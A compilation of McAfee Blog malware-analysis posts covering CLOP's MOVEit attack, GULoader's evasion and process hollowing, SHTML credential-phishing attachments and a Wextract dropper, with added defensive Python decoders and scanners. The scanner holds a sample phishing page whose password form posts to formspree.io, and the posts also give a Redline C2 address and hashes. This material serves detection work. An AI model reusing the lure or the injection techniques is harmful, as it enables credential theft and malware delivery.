SQL injection is a technique by which attackers exploit vulnerabilities that allow the injection of malicious code into an application in order to view or modify a database (in this case, MOVEit’s).
Ransomware is a certain class of malware that tries to extort money as a ransom payment. The typical tactics for such malware are:
While there were no reports of file encryption in this wave, the malicious actors stole files from the impacted companies and are now extorting them by demanding payment to prevent the hackers from releasing the files to the public. It should be noted that this is not the first time Clop has used these tactics.
The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) first warned of this attack via a press release on June 7, 2023. The attackers exploited a zero-day vulnerability in MOVEit software. Internet-facing MOVEit Transfer web applications were compromised through the vulnerabilities listed above and infected with malware that then stole data from the underlying MOVEit databases. As a result, any file transferred using MOVEit could also have been stolen by the malicious actors. Once the data was siphoned, the attackers contacted the organizations to inform them that they were victims of an attack and that the files would be published if a ransom was not paid on time.
The impact of this is that potentially sensitive files that may have contained intellectual property or personally identifiable customer data could be made available on the Internet. This, of course, would have severe ramifications for not only the impacted organizations, but also for customers or users who had provided information to them.
What can you do?
If you operate a business that utilizes the MOVEit software, it is imperative that you follow guidance provided by Progress Software and CISA.
It’s unlikely that individual consumers will be directly impacted by the CLOP malware. However, you may have been indirectly impacted if an organization you previously subscribed to or provided information to is a victim. This FAQ and blog by McAfee contain useful details on what steps to follow if your data is part of a data breach.
Such breaches can also have a ripple effect, where malicious actors who were not directly involved with the ransomware attack take advantage of the event to target potential victims with scams. Be cautious of emails or other correspondence claiming to be from a company impacted by this ransomware attack; double-check the sender’s email address and verify any links present in the emails. Read more about how to recognize and protect yourself from phishing.
The post CLOP Ransomware exploits MOVEit software appeared first on McAfee Blog.
Authored by: Anandeshwar Unnikrishnan
In recent GULoader campaigns, we are seeing a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system. The NSIS scriptable installer is a highly efficient software packaging utility. The installer behavior is dictated by an NSIS script and users can extend the functionality of the packager by adding custom libraries (dll) known as NSIS plugins. Since its inception, adversaries have abused the utility to deliver malware.
NSIS stands for Nullsoft Scriptable Installer. NSIS installer files are self-contained archives, which enables malware authors to include malicious assets along with junk data. The junk data serves as an AV-evasion technique. The image below shows the structure of an NSIS GULoader staging executable archive.
The NSIS script, which is a file found in the archive, has a file extension “.nsi” as shown in the image above. The deployment strategy employed by the threat actor can be studied by analyzing the NSIS script commands provided in the script file. The image shown below is an oversimplified view of the whole shellcode staging process.
The file holding the encoded GULoader shellcode is dropped onto the victim’s disk, along with other data, according to the script configuration. Junk is prepended to the encoded shellcode. The encoding style varies from sample to sample, but in almost all cases it is a simple XOR encoding. Because the shellcode follows the junk data, an offset is used to retrieve the encoded GULoader shellcode; in the image, the FileSeek NSIS command performs the offsetting. Some samples have unprotected GULoader shellcode appended to the junk data.
A plugin used by the NSIS installer is simply a DLL that the installer program loads at runtime, calling the functions exported by the library. Two DLL files are dropped in the user’s TEMP directory; in all analyzed samples, one DLL has the consistent name system.dll and the name of the other varies.
The system.dll is responsible for allocating memory for the shellcode and its execution. The following image shows how the NSIS script calls functions in plugin libraries.
system.dll has the exports shown in the image below. The function named “Call” is used to deploy the shellcode on the victim’s system.
The way the operating system implements exception handling gives an adversary an opportunity to take over the execution flow. Vectored Exception Handling (VEH) on Windows lets a program register a custom exception handler, which is simply code that runs when an exception occurs. What makes exception handling interesting is how the system resumes the program’s normal execution flow after the exception. Adversaries exploit this mechanism to take ownership of the execution flow: when the exception occurs, malware can divert execution to code under its control. Malware normally uses this to achieve the following goals:
GULoader employs VEH mainly to obfuscate the execution flow and slow down analysis. This section covers the internals of Vectored Exception Handling on Windows and investigates how GULoader abuses the VEH mechanism to thwart analysis efforts.
The Handler routine is of the type PVECTORED_EXCEPTION_HANDLER. Further checking the documentation, we can see the handler function takes a pointer to _EXCEPTION_POINTERS type as its input as shown in the image below.
The _EXCEPTION_POINTERS type holds two important structures: PEXCEPTION_RECORD and PCONTEXT. PEXCEPTION_RECORD contains all the information related to the exception raised by the system, such as the exception code, and PCONTEXT holds the CPU register values (RIP/EIP, debug registers, etc.), i.e. the state of the thread captured when the exception occurred.
Vectored Handler in GULoader
GULoader deliberately sets the trap flag to trigger single-stepping in order to detect analysis. When the handler code runs, as discussed before, a block of code is selected based on the exception code. If the exception is a single-step exception (status code 0x80000004), the following actions take place:
EIP Calculation Logic Summary

Trigger | EIP calculation
--- | ---
Trigger via interrupt instruction (INT3) | eip = ((ReadByte(eip+1) ^ 0x1A) + eip)
Trigger via single stepping (PUSHFD/POPFD) | eip = ((ReadByte(eip+2) ^ 0x1A) + eip)

*The value 0x1A changes with samples
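To make the two formulas in the table concrete, here is an added Python example (not code from the post or from GULoader itself) that computes the EIP a handler following these rules would install, and then follows a chain of INT3 trampolines through a constructed code buffer so an analyst can recover the real control flow statically. The buffer, the base address 0x401000 and the choice to treat the context EIP as the address of the trigger byte are assumptions made for the illustration; the key 0x1A is the per-sample constant from the table.

```python
# Added example: resolve GULoader-style VEH control flow statically.
# The code buffer and base address are constructed; KEY is the 0x1A value from
# the table above (the post notes it changes between samples).
INT3 = 0xCC
PUSHFD = 0x9C
POPFD = 0x9D
KEY = 0x1A


def next_eip(code: bytes, base: int, eip: int, trigger: str, key: int = KEY) -> int:
    """Return the EIP the handler installs for a trigger at `eip`.

    trigger is "int3" (breakpoint exception) or "single_step" (trap flag set
    via PUSHFD/POPFD). `eip` stands for the value read from CONTEXT.Eip; in
    this example it is assumed to be the address of the trigger byte.
    """
    off = eip - base
    if trigger == "int3":
        return (code[off + 1] ^ key) + eip
    if trigger == "single_step":
        return (code[off + 2] ^ key) + eip
    raise ValueError(f"unknown trigger {trigger!r}")


def walk_int3_chain(code: bytes, base: int, eip: int, key: int = KEY, limit: int = 64) -> list:
    """Follow consecutive INT3 trampolines and return every address visited.

    Stops at the first address that is not an INT3 (real code resumes there),
    at the end of the buffer, or after `limit` hops so a cycle in hostile
    input cannot loop forever.
    """
    path = [eip]
    while len(path) < limit:
        off = eip - base
        if not 0 <= off < len(code) or code[off] != INT3:
            break
        eip = next_eip(code, base, eip, "int3", key)
        path.append(eip)
    return path


# Constructed sample: two INT3 trampolines and one PUSHFD/POPFD trigger.
SAMPLE_BASE = 0x401000
SAMPLE_CODE = bytearray(b"\x90" * 0x40)                      # NOP filler
SAMPLE_CODE[0x00:0x02] = bytes([INT3, 0x10 ^ KEY])           # -> base + 0x10
SAMPLE_CODE[0x10:0x12] = bytes([INT3, 0x20 ^ KEY])           # -> base + 0x30
SAMPLE_CODE[0x20:0x23] = bytes([PUSHFD, POPFD, 0x08 ^ KEY])  # -> base + 0x28

if __name__ == "__main__":
    print([hex(a) for a in walk_int3_chain(SAMPLE_CODE, SAMPLE_BASE, SAMPLE_BASE)])
    print(hex(next_eip(SAMPLE_CODE, SAMPLE_BASE, SAMPLE_BASE + 0x20, "single_step")))
```

The chain walker is what an analyst wants when annotating a disassembly: it turns a sequence of apparent crashes into the list of addresses that actually execute.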
Detecting Abnormal Execution Flow via VEH
The image below shows the carefully laid out code used to detect analysis.
One interesting feature seen in GULoader shellcode in the wild is runtime padding. Runtime padding is an evasive behavior to beat automated scanners and other security checks employed at runtime. It delays the malicious activities performed by the malware on the target system.
The following images show the egg location validity checks performed by GULoader. The values 0xB8 and 0xC3 are checked by using proper offsets from the egg location.
In the second stage of the infection chain, the GULoader performs anti-analysis and code injection. Major anti-analysis vectors are listed below. After making sure that shellcode is not running in a sandbox, it proceeds to conduct code injection into a newly spawned process where stage 3 is initiated to download and deploy actual payload. This payload can be either commodity stealer or RAT.
Whenever GULoader invokes a Win32 API, the call is sandwiched between two XOR loops, as shown in the image below. The loop prior to the call encodes the active shellcode region in which the call takes place, to prevent security products based on event monitoring or API-call hooks from dumping the memory. After the call, the shellcode region is decoded back to normal and execution resumes. The XOR key used is a word present in the shellcode itself.
This section covers the process undertaken by the GUloader to decode the strings at the runtime.
The first byte/word is reserved to hold the size of the encoded bytes. The image below shows 12 bytes of encoded data being written to memory.
Later, the first word is replaced by the first word of the actual encoded data. The image below shows the buffer after the first word has been replaced.
The encoded data is now fully recovered, and the malware proceeds to decode it. Decoding uses a simple XOR with a key that is present in the shellcode. The assembly routine that does the decoding is shown in the image below; each byte in the buffer is XORed with the key.
The result of the XOR operation is written back to the same memory buffer that holds the encoded data. A final view of the memory buffer with the decoded data is shown below.
The image shows the decoding of the string “psapi.dll”; this string is later used to fetch the addresses of various functions employed for anti-analysis.
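As an added illustration of the buffer layout just described (not the post’s own code or GULoader’s), the Python below stages a buffer the same way (size word first, then overwritten with the real first word) and decodes it. The plaintext “psapi.dll”, the single-byte key 0x5A and the 12-byte length are constructed sample values; a single-byte repeating key is an assumption, since the post says only that the key is stored in the shellcode.

```python
# Added example: size-prefixed, XOR-encoded string buffer as described above.
# Sample plaintext, key and length are constructed for the illustration.
import struct


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of `data` with the repeating `key`."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def stage_buffer(encoded: bytes) -> bytearray:
    """Reproduce the two writes observed in memory.

    1. A size word (first 2 bytes) followed by the remaining encoded bytes.
    2. The size word is overwritten with the real first word of the data.
    """
    buf = bytearray(struct.pack("<H", len(encoded)) + encoded[2:])
    buf[0:2] = encoded[0:2]
    return buf


def decode_string(buf: bytes, key: bytes) -> str:
    """XOR each byte with the key, drop NUL padding and return the text."""
    return xor_bytes(bytes(buf), key).rstrip(b"\x00").decode("ascii")


# Constructed sample: 12 encoded bytes holding "psapi.dll" plus NUL padding,
# matching the 12-byte write shown in the post.
SAMPLE_KEY = b"\x5a"                      # assumed single-byte key
SAMPLE_PLAIN = b"psapi.dll\x00\x00\x00"
SAMPLE_ENCODED = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    staged = stage_buffer(SAMPLE_ENCODED)
    print(staged.hex(), "->", decode_string(staged, SAMPLE_KEY))
```

In a live analysis the same decode function can be pointed at a memory dump once the key word has been located in the shellcode, which is usually faster than single-stepping the decoding loop for every string.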
Stage 2 culminates in code injection. Specifically, GULoader employs a variation of the process hollowing technique: the malware stager process spawns a benign process in a suspended state, overwrites the original content of the suspended process with malicious content, changes the state of the suspended process’s thread by modifying processor register values such as EIP, and finally resumes the process. By controlling EIP, the malware can direct the control flow in the spawned process to a code location of its choosing. After a successful hollowing, the malware code runs under the cover of a legitimate application.
The variation of hollowing technique employed by the GULoader doesn’t replace the file contents, but instead injects the same shellcode and maps the memory in the suspended process. Interestingly, GULoader employs an additional technique if the hollowing attempt fails. More details are covered in the following section.
The Win32 native APIs listed below are dynamically resolved at runtime to perform the code injection.
After memory allocation, it writes itself into the remote process via NtWriteVirtualMemory, as discussed above. GULoader shellcodes seen in the field are large; the samples taken for this analysis are all larger than 20 MB. In the samples analyzed, the buffer allocated to hold the shellcode is 2950000 bytes. The image below shows the GuLoader shellcode in memory.
The RVA is added to the base address of the newly allocated memory in the CasPol.exe process to obtain a new VA that is valid in the remote process. The new VA is written into the EIP and EBX fields of the thread context structure of the CasPol.exe process, retrieved via ZwGetContextThread. The image below shows the modified context structure and the value of EIP.
Finally, by calling ZwSetContextThread, the changes made to the CONTEXT structure are committed to the target thread of the CasPol.exe process. The thread is resumed by calling NtResumeThread, and CasPol.exe resumes execution and performs stage 3 of the infection chain.
The GULoader shellcode resumes execution from within a new host process; in the samples analyzed for this report, the shellcode is injected either into a child process spawned from the same executable or into CasPol.exe. Stage 3 performs all the anti-analysis checks once again to make sure this stage is not being analyzed. After all the checks, GULoader proceeds with stage 3 activities by decoding the encoded C2 string in memory, as shown in the image below. The decoding method is the same as discussed before.
Later, the addresses of the following functions are resolved dynamically by loading wininet.dll:
The image below shows the response from the content delivery network (CDN) server where the final payload is stored. In this analysis, a payload of 0x2E640 bytes is sent to the loader. Interestingly, the loader ignores the first 40 bytes; the actual payload starts at offset 40, which is highlighted in the image.
The CDN server is well protected: it only serves clients that present the proper headers and cookies. If these are not present in the HTTP request, the following message is shown to the user.
The first step in decoding the downloaded final payload is generating a quasi key, which is later used to decode the actual key embedded in the GULoader shellcode. The encoded embedded key is 371 bytes in the analyzed sample. The process of quasi key generation is as follows:
The embedded key in the GULoader shellcode is 371 bytes in size, as discussed before. The quasi key is used to decode the embedded key, as shown in the image below.
The decoded 371-byte embedded key is shown in the image below.
After the embedded key is decoded in memory, a byte-level decoding takes place. Each byte of the downloaded data is XORed with the key to obtain the actual data, which is a PE file. The decoded data overwrites the same buffer that was used to hold the downloaded data.
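An added Python example (not GULoader’s code or the post’s) of the last two steps: decoding the embedded key with the quasi key, then skipping the 40-byte prefix and XOR-decoding the download with the 371-byte key, followed by the MZ/PE header check an analyst uses to confirm the result. The quasi key, the key bytes, the 40 junk bytes and the minimal PE-shaped buffer are constructed; that both decoding steps are plain repeating XOR is an assumption, since the post does not detail how the quasi key is applied.

```python
# Added example: recover the final GULoader payload from a download buffer.
# Offsets and key length come from the analysis above; all sample data is
# constructed, and the quasi-key step being a repeating XOR is an assumption.
import struct

PAYLOAD_OFFSET = 40      # bytes the loader ignores at the start of the download
EMBEDDED_KEY_LEN = 371   # size of the key embedded in the shellcode


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of `data` with the repeating `key`."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_embedded_key(encoded_key: bytes, quasi_key: bytes) -> bytes:
    """Assumption for this example: the quasi key is applied as a repeating XOR."""
    return xor_bytes(encoded_key, quasi_key)


def decode_payload(download: bytes, embedded_key: bytes, offset: int = PAYLOAD_OFFSET) -> bytes:
    """Skip the leading junk and XOR each remaining byte with the key."""
    return xor_bytes(download[offset:], embedded_key)


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on the decoded buffer: MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# --- constructed sample data ---------------------------------------------
SAMPLE_QUASI_KEY = bytes([0x5A, 0xA5, 0x3C, 0xC3])
SAMPLE_EMBEDDED_KEY = bytes((i * 7 + 3) & 0xFF for i in range(EMBEDDED_KEY_LEN))
SAMPLE_ENCODED_KEY = xor_bytes(SAMPLE_EMBEDDED_KEY, SAMPLE_QUASI_KEY)

# Minimal PE-shaped buffer: "MZ", e_lfanew at 0x3C pointing to "PE\0\0" at 0x40.
_pe = bytearray(0x80)
_pe[0:2] = b"MZ"
struct.pack_into("<I", _pe, 0x3C, 0x40)
_pe[0x40:0x44] = b"PE\x00\x00"
SAMPLE_PE = bytes(_pe)

# What the CDN would return: 40 junk bytes followed by the XOR-encoded PE.
SAMPLE_DOWNLOAD = bytes(range(PAYLOAD_OFFSET)) + xor_bytes(SAMPLE_PE, SAMPLE_EMBEDDED_KEY)


def recover_sample() -> bytes:
    """Run the full chain on the constructed sample and return the decoded bytes."""
    key = decode_embedded_key(SAMPLE_ENCODED_KEY, SAMPLE_QUASI_KEY)
    return decode_payload(SAMPLE_DOWNLOAD, key)


if __name__ == "__main__":
    out = recover_sample()
    print("PE recovered:", looks_like_pe(out), "size:", len(out))
```

The header check matters in practice: a wrong key length or a wrong prefix offset still produces a buffer of the right size, and verifying MZ plus the PE signature at e_lfanew is the quickest way to tell a correct decode from garbage before handing the result to a PE parser.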
The final decoded PE file residing in the memory is shown in the image below:
Finally, the loader loads the PE file by allocating memory with RWX permission in the stage 3 process, which, based on analysis of multiple samples, is either the same executable spawned as a child process in stage 2 or CasPol.exe. Loading involves code relocation and IAT correction, as expected in such a scenario. The final payload resumes execution from within the hollowed stage 3 process. The following malware families are usually seen deployed by GULoader:
The image below shows the injected memory regions in the stage 3 process, CasPol.exe in this report.
Malware loaders, popularly known as “crypters”, play a significant role in deploying Remote Administration Tools and stealer malware that targets consumer data. The Personally Identifiable Information (PII) exfiltrated from compromised endpoints is collected in bulk and funneled to underground data-selling marketplaces. This also affects businesses, since credentials and other information used for authentication leak from users’ personal systems and lead to initial access to company networks. GuLoader is heavily used in mass malware campaigns to infect users with popular stealers such as Raccoon, Vidar, and Redline; commodity RATs like Remcos are also delivered in such campaigns. On the bright side, malware specimens used in mass campaigns are not difficult to fingerprint because of their volume and prevalence, and detection rules and systems can be built around that fact.
Win32 API
RtlAddVectoredExceptionHandler
NtAllocateVirtualMemory
DbgUIRemoteBreakIn
LdrLoadDll
DbgBreakPoint
EnumWindows
Nt/ZwSetInformationThread
EnumDeviceDrivers
GetDeviceDriverBaseNameA
MsiEnumProductsA
MsiGetProductInfoA
TerminateProcess
ExitProcess
NtSetContextThread
NtWriteVirtualMemory
NtCreateSection
NtMapViewOfSection
NtOpenFile
NtSetInformationProcess
NtClose
NtResumeThread
NtProtectVirtualMemory
CreateProcessInternal
GetLongPathNameW
Sleep
NtCreateThreadEx
WaitForSingleObject
TerminateThread
CreateFileW
WriteFile
CloseHandle
GetFileSize
ReadFile
ShellExecuteW
SHCreateDirectoryExW
RegCreateKeyExA
RegSetValueExA
OpenSCManagerA
EnumServiceStatusA
CloseServiceHandle
NtQueryInformationProcess
InternetOpenA
InternetSetOptionA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
889fddcb57ed66c63b0b16f2be2dbd7ec0252031cad3b15dfea5411ac245ef56
59b71cb2c5a14186a5069d7935ebe28486f49b7961bddac0a818a021373a44a3
4d9cdd7526f05343fda35aca3e0e6939abed8a037a0a871ce9ccd0e69a3741f2
c8006013fc6a90d635f394c91637eae12706f58897a6489d40e663f46996c664
c69e558e5526feeb00ab90efe764fb0b93b3a09692659d1a57c652da81f1d123
45156ac4b40b7537f4e003d9f925746b848a939b2362753f6edbcc794ea8b36a
e68ce815ac0211303d2c38ccbb5ccead144909d295230df4b7a419dfdea12782
b24b36641fef3acbf3b643967d408b10bf8abfe1fe1f99d704a9a19f1dfc77e8
569aa6697083993d9c387426b827414a7ed225a3dd2e1e3eba1b49667573fdcb
60de2308ebfeadadc3e401300172013be27af5b7d816c49696bb3dedc208c54e
23458977440cccb8ac7d0d05c238d087d90f5bf1c42157fb3a161d41b741c39d
The post GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader appeared first on McAfee Blog.
Authored By Anuradha
McAfee Labs has recently observed a new wave of phishing attacks in which the attacker abuses server-parsed HTML (SHTML) files. SHTML files are commonly associated with web servers; here they are used to redirect users to malicious credential-stealing websites or to display phishing forms locally within the browser to harvest sensitive user information.
SHTML Campaign in the field:
Figure 1 shows the geographic distribution of McAfee clients that detected malicious SHTML files.
Figure 1. McAfee Client Detection of SHTML
Attackers victimize users by distributing SHTML files as email attachments. The lures used in such phishing emails include payment confirmations, invoices, shipments, and so on. The email contains a short thread of messages to make the recipient more curious to open the attachment.
Figure 2. Email with SHTML attachment
Analysis:
When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser, as shown in Figure 3. To read the document, however, the user must enter their credentials. In some cases, the email address is prefilled.
Figure 3. Fake PDF document
Figure 4. Fake Excel document
Figure 5. Fake DHL Shipping document
Attackers commonly use JavaScript in the SHTML attachments, either to generate the malicious phishing form, to redirect the victim, or to hide malicious URLs and behavior.
Figure 6. SHTML with JavaScript code
Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as:
https://isc.sans.edu
https://i.gyazo.com
Figure 7. Code to load blurred image
Abusing submission form service:
Phishing attacks abuse static form service providers such as Formspree and Formspark to steal sensitive user information.
Formspree.io is a back-end service that allows developers to easily add forms to their websites without writing server-side code; it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address.
The attackers use a formspree.io URL as the form’s action URL, which defines where the form data is sent. Figure 8 below shows the code snippet for the action URL, which works in conjunction with the POST method.
Figure 8. Formspree.io as action URL with POST method
When the user enters credentials and hits the “submit” button, the data is sent to Formspree.io, which then forwards the information to the specified email address. Figure 9 below shows the flow of user submission data from the web page to the attacker’s email address.
Figure 9. Flow of user submission data
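As an added example (not the post’s or the campaign’s code), the Python below performs the check a mail gateway or triage script would run on such an attachment: parse the (S)HTML, find forms whose action POSTs to a hosted form service, count password fields, and record external image hosts and blur styling. The two sample documents, the form id EXAMPLEFORMID and the host list are constructed; the hosts are an assumed example set to extend with whatever services appear in your own telemetry.

```python
# Added example: static triage of an SHTML phishing attachment.
# Sample documents and the form-service host list are constructed for the
# illustration; adjust FORM_SERVICE_HOSTS to the services seen in practice.
from html.parser import HTMLParser
from urllib.parse import urlparse

FORM_SERVICE_HOSTS = {"formspree.io", "formspark.io", "submit-form.com"}


class FormScanner(HTMLParser):
    """Collect the indicators described in the post from an (S)HTML document."""

    def __init__(self):
        super().__init__()
        self.form_targets = []      # (host, method) for every <form>
        self.password_fields = 0
        self.external_images = []   # hosts serving <img> content
        self.blurred = False        # any element styled with a CSS blur()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # attribute values may be None
        if tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            self.form_targets.append((host, a.get("method", "get").lower()))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "img":
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host:
                self.external_images.append(host)
        if "blur(" in a.get("style", "").replace(" ", ""):
            self.blurred = True


def _is_form_service(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in FORM_SERVICE_HOSTS)


def scan_shtml(text: str) -> dict:
    """Return the collected indicators plus an overall verdict."""
    p = FormScanner()
    p.feed(text)
    p.close()
    posts_to_service = any(_is_form_service(h) and m == "post" for h, m in p.form_targets)
    findings = []
    if posts_to_service:
        findings.append("form POSTs to a hosted form service")
    if p.password_fields:
        findings.append(f"{p.password_fields} password field(s) in a local file")
    if p.blurred:
        findings.append("blurred background (fake document) styling")
    return {
        "form_targets": p.form_targets,
        "external_images": p.external_images,
        "findings": findings,
        "suspicious": posts_to_service and p.password_fields > 0,
    }


# Constructed samples: a lure in the style described above, and a benign page.
SAMPLE_PHISH = """<!--#echo var="DATE_LOCAL" -->
<html><body style="background:#fff">
<img src="https://i.gyazo.com/EXAMPLE.png" style="filter: blur(4px); width:100%">
<form action="https://formspree.io/f/EXAMPLEFORMID" method="POST">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="password" placeholder="Enter password to view">
  <input type="submit" value="View Document">
</form></body></html>"""

SAMPLE_BENIGN = """<html><body>
<form action="/login" method="post">
  <input type="text" name="user"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, scan_shtml(doc))
```

The verdict deliberately requires both a password field and a POST to a third-party form host; a legitimate contact form on Formspree has no password field, and a legitimate login page posts to its own origin, so either indicator alone produces too many false positives.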
Known malicious forms may be blocked, preventing the form submission data from reaching the attacker. Figure 10 below shows a form blocked due to suspected fraudulent activity.
Figure 10. Form Blocked
To prevent the user from realizing that they have just been phished, the attacker redirects the user’s browser to an unrelated error page belonging to a legitimate website. Figure 11 below shows the redirected web page.
Figure 11. Redirected webpage
To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry-image phishing scam uses simple HTML and JavaScript code, but it can still be effective: a blurry image is enough to trick many users into believing the email is legitimate. To stay protected, users should keep their systems up to date and refrain from clicking links and opening SHTML attachments that arrive by email from untrusted sources.
IOCs
McAfee customers are protected against this phishing campaign.
Type | Value | Product | Detected
--- | --- | --- | ---
shtml (Adobe) | 0a072e7443732c7bdb9d1f3fdb9ee27c | Total Protection and LiveSafe | HTML/Phishing.qz
shtml (Excel) | 3b215a37c728f65c167941e788935677 | Total Protection and LiveSafe | HTML/Phishing.rb
shtml (DHL) | 257c1f7a04c93a44514977ec5027446c | Total Protection and LiveSafe | HTML/Phishing.qz
The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.
Authored by Yashvi Shah
McAfee Labs has identified an increase in Wextract.exe samples that drop a malware payload in multiple stages.
Wextract.exe is a Windows executable file that is used to extract files from a cabinet (.cab) file. Cabinet files are compressed archives that are used to package and distribute software, drivers, and other files. It is a legitimate file that is part of the Windows operating system, and it is located in the System32 folder of the Windows directory. However, like other executable files, it can be vulnerable to exploitation by malicious actors who might use it as a disguise for malware.
Some common ways that malicious actors use a fake or modified version of wextract.exe include:
McAfee Labs collected malicious wextract.exe samples from the wild, and its behavior was analyzed.
This blog provides a detailed technical analysis of a malicious “wextract.exe” used as a delivery mechanism for multiple types of malware, including Amadey and Redline Stealer. It also describes the techniques the malware uses to evade detection by security software and execute its payload. Once the malware payloads are executed on the system, they establish communication with a Command and Control (C2) server controlled by the attacker. This communication allows the attacker to exfiltrate data from the victim’s system, including sensitive information such as login credentials, financial data, and other personal information.
Figure 1: Characteristic of the file
The file is a 32-bit Portable Executable file, 631.50 KB in size. The original name of the file is WEXTRACT.EXE.MUI. The file description is “Самоизвлечение CAB-файлов Win32”, which is Russian for “Self-Extracting Win32 CAB Files”. The legal copyright mentions Microsoft Corporation. Many of the file’s static strings are in Russian.
Normally, the resource section (.rsrc) contains resources used by the program, such as icons, bitmaps, strings, and dialog boxes. Attackers leverage the resource section of a PE file to improve the success of their attacks by evading detection, enhancing persistence, and adding functionality.
The resource section of this sample has multiple files, of which the CABINET resource accounts for 75.75% of the total file, which makes that resource suspicious.
Figure 2: Resources in the file
A CAB (Cabinet) file is a compressed archive file format that is often used to compress and package multiple files into a single file for distribution or installation. A CAB file in the resource section of a PE file can be used for various purposes such as storing additional program files or data, including language-specific resources, or compressing and storing commonly used resources to reduce the size of the executable.
The CABINET holds two executables, cydn.exe and vona.exe.
Figure 3: CABINET in resource section
Likewise, under RCDATA there is another attribute called “RUNPROGRAM”, which starts cydn.exe. RUNPROGRAM in the resource section of a malware file typically refers to a resource that contains instructions for the malware to execute a specific program or command. When the malware is executed, it loads the resource containing the “RUNPROGRAM” command and attempts to execute the specified program or command. Malware authors often use this technique to execute additional malicious programs or commands on the infected system. For example, the “RUNPROGRAM” resource may contain instructions to download and execute additional malware, or to launch a malicious script or command that performs activities such as stealing sensitive data, creating backdoors, or disabling security software.
Figure 4: RUNPROGRAM attribute stating “cydn.exe”
Like RUNPROGRAM, POSTRUNPROGRAM also holds the instruction to run the executable after RUNPROGRAM is executed. Hence, once cydn.exe is executed, vona.exe will be executed.
Figure 5: POSTRUNPROGRAM stating “vona.exe”
Once WEXTRACT.exe is executed, both cydn.exe and vona.exe are dropped in the TEMP folder. The TEMP folder is a commonly used location for malware to store temporary files and other data, as it is typically writable by any user account and is not usually subject to strict security restrictions. This makes it easier for the malware to operate without raising suspicion or triggering security alerts.
Figure 6: Files dropped in TEMP folder
The resource section accounts for a high proportion of the file and has an entropy of 7.810. Entropy is a measure of the randomness or unpredictability of the data in a file and is often used as an indicator of whether a file is likely to be malicious.
In the case of a PE file, high entropy can indicate that the file contains a significant amount of compressed or encrypted data, or that it has been obfuscated or packed in a way that makes it more difficult to analyze. This can be a common technique used by malware authors to evade detection by antivirus software.
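To make the two heuristics concrete, here is an added Python example (not the post’s code) that computes a resource’s size ratio and Shannon entropy and combines them the way a triage script would. The thresholds (70% of the file, 7.5 bits per byte) and the two sample buffers are assumed values chosen for the illustration; the 75.75% and 7.810 reported above are fed to the same classifier at the end.

```python
# Added example: resource-section size ratio and entropy as triage heuristics.
# Thresholds and sample buffers are constructed for the illustration.
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_resource(ratio: float, entropy: float,
                      ratio_threshold: float = 0.70,
                      entropy_threshold: float = 7.5) -> dict:
    """Combine the two heuristics; both thresholds are assumed example values."""
    return {
        "ratio": round(ratio, 4),
        "entropy": round(entropy, 3),
        "suspicious": ratio >= ratio_threshold and entropy >= entropy_threshold,
    }


def analyze_resource(resource: bytes, file_size: int) -> dict:
    """Ratio of one resource's size to the whole file, plus its entropy."""
    if file_size <= 0:
        raise ValueError("file_size must be positive")
    return classify_resource(len(resource) / file_size, shannon_entropy(resource))


# Constructed samples: a uniform byte distribution (what packed or encrypted
# data approaches) versus repetitive plain data, each ~73% of a 1400-byte file.
SAMPLE_PACKED = bytes(range(256)) * 4     # 1024 bytes, entropy exactly 8.0
SAMPLE_PLAIN = b"A" * 1024                # 1024 bytes, entropy 0.0
SAMPLE_FILE_SIZE = 1400

if __name__ == "__main__":
    print(analyze_resource(SAMPLE_PACKED, SAMPLE_FILE_SIZE))
    print(analyze_resource(SAMPLE_PLAIN, SAMPLE_FILE_SIZE))
    print(classify_resource(0.7575, 7.810))   # the values reported above
```

Neither number is proof on its own: installers and games legitimately carry large, compressed resources. The value of the pair is that a large, high-entropy CABINET resource inside a file that claims to be a system component is worth unpacking and looking at, which is exactly what the rest of this analysis does.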
Figure 7: File ratio and entropy of the resource section
Like the previous file, cydn.exe also had two executables archived in its resource section, named aydx.exe and mika.exe. The “RUNPROGRAM” attribute commands to run aydx.exe and the “POSTRUNPROGRAM” attribute commands to execute mika.exe once aydx.exe is executed. These files are also dropped in TEMP folder.
Figure 8: aydx.exe and mika.exe packed in resource section
Figure 9: Executables dropped in another TEMP folder
The order of file execution is as follows: First, Wextract.exe and cydn.exe, which have already been discussed, are followed by aydx.exe, and then by mika.exe and vona.exe.
Figure 10: Execution flow
Aydx.exe is a 32-bit Portable Executable file, 405 KB in size and compiled in C/C++. Once executed, it attempts to make a request to the IP address 193.233.20.7.
Figure 11: Malware trying to connect to IPv4
This IP address is linked with Redline Stealer connecting on port number 4138.
Analysis of mika.exe
